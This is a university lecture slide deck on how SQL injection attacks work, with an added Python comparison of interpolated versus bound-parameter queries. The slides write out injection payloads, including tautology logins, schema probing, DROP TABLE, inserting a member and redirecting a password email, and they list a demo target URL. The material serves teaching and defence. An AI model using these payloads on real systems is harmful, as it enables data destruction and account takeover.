SQL Injection Attack - Syracuse University · 2006-09-27
SQL Injection Attack
Modus operandi. . .
Sridhar.V.Iyer (siyer02@syr.edu)
Department of Computer & Information Sciences
Syracuse University, Syracuse, NY-13210
SQL Injection Attack – p. 1
SQL
What is SQL?
Where is it used?
Why do we use it?
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solaris and . . . Windows.
Web Servers: Apache, LightTPD, Yaws, Tux, IIS
Databases: MySQL, PostgreSQL, Firebird, MSSQL server
Scripting Languages: PHP, CGI/Perl, Smalltalk, ASP.NET
Other Alternatives: J2EE/JSP etc.
Modus Operandi... Steve Friedl's way
Know your enemy
Find his/her weakness
Attack his/her weakness
Anatomy of the Attack
The constructed SQL should look like
SELECT list FROM table WHERE field='$EMAIL';
What if I give my own email and complete the query for the form?
SELECT list FROM table WHERE field='[email protected]'';
What is the output?
Let's dig deeper. . .
Let's create a valid query
SELECT list FROM table WHERE field='something' or 'x'='x';
Result?
Your login information has been mailed to
Don't recognize that email address
Server error!!
Let's behave ourselves
Schema field mapping: Figure out the tentative field list
SELECT list FROM table WHERE field='x' AND email IS NULL;--';
Find out as many fields as possible in a similar fashion.
Find out the table name. How?
Let's behave ourselves
We can try the query SELECT COUNT(*) FROM tablename;
SELECT . . . email='x' AND 1=(SELECT COUNT(*) FROM tablename);--';
Again an educated guess is required. The sites won't have cryptic table names.
Are we interested in this table?
SELECT list FROM table WHERE field='x' AND members.email IS NULL;--';
If the database wasn't read-only??
Bazoooooka
SELECT . . . ='x'; DROP TABLE members;--';
Add a new member
SELECT . . . ='x'; INSERT INTO members(. . . ) VALUES (. . . );--';
Mail me the password
SELECT . . . ='x'; UPDATE members SET [email protected] WHERE [email protected]';
Other Methods
Use xp_cmdshell: Something like a Macro for MS Word
Map Database structure: Do more of the stuff we already discussed for just one form
Time for some action
http://128.230.212.170/apache2-default/login.php
How not to do the wrong thing
Sanitize the Input
Quote-safe the Input
Use bound parameters
Limit Database Permissions and segregate users
Use Stored procedures for database access
Isolate the Webserver
Configure Error Reporting
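The two lookups below put the deck's interpolated WHERE field='$EMAIL' query next to the bound-parameter form recommended on this slide, and run the stray-quote and 'x'='x' inputs from the Anatomy and "Let's dig deeper" slides through both. This is an added example, not code from the slides; it assumes an in-memory SQLite database as a stand-in for MySQL, a constructed two-row members table, and the hypothetical function names make_db, lookup_vulnerable, lookup_safe and compare.

```python
import sqlite3

# Constructed sample data standing in for the deck's "members" table
# (SQLite in memory is used here as a stand-in for MySQL).
MEMBERS = [
    ("alice@example.com", "s3cret-a"),
    ("bob@example.com", "s3cret-b"),
]


def make_db():
    """Create an in-memory database holding the constructed members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (email TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    return conn


def lookup_vulnerable(conn, email):
    """Builds the query by string interpolation, the shape of the deck's
    SELECT list FROM table WHERE field='$EMAIL'.  Returns the matching
    emails, or the string "server error" when the database rejects the
    statement (a generic message, so no SQL detail leaks to the client)."""
    sql = f"SELECT email FROM members WHERE email='{email}'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError:
        return "server error"


def lookup_safe(conn, email):
    """Bound parameter: the input is handed to the driver separately and is
    never spliced into the SQL text, so quotes inside it are just data."""
    sql = "SELECT email FROM members WHERE email=?"
    return [row[0] for row in conn.execute(sql, (email,))]


def compare(conn, email):
    """Run the same input through both lookups for side-by-side inspection."""
    return {"vulnerable": lookup_vulnerable(conn, email),
            "safe": lookup_safe(conn, email)}


if __name__ == "__main__":
    db = make_db()
    for probe in ("alice@example.com",      # honest input: one row either way
                  "x'",                     # stray quote: the deck's "Server error!!"
                  "something' or 'x'='x"):  # the deck's tautology: every row leaks
        print(repr(probe), compare(db, probe))
```

The tautology input returns both rows from the interpolated query and no rows from the bound-parameter one, which is the whole difference the slide is pointing at.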
DISCLAIMER
Any actual or imagined resemblance to our far more civilized world today is unintentional and purely coincidental
The purpose of this presentation is purely educational
Reference
http://www.unixwiz.net/techtips/sql-injection.html
PHP Manual.
MySQL Manual.
Google. . . of course.
This presentation has been created using the prosper package on LaTeX
Thanks
Questions?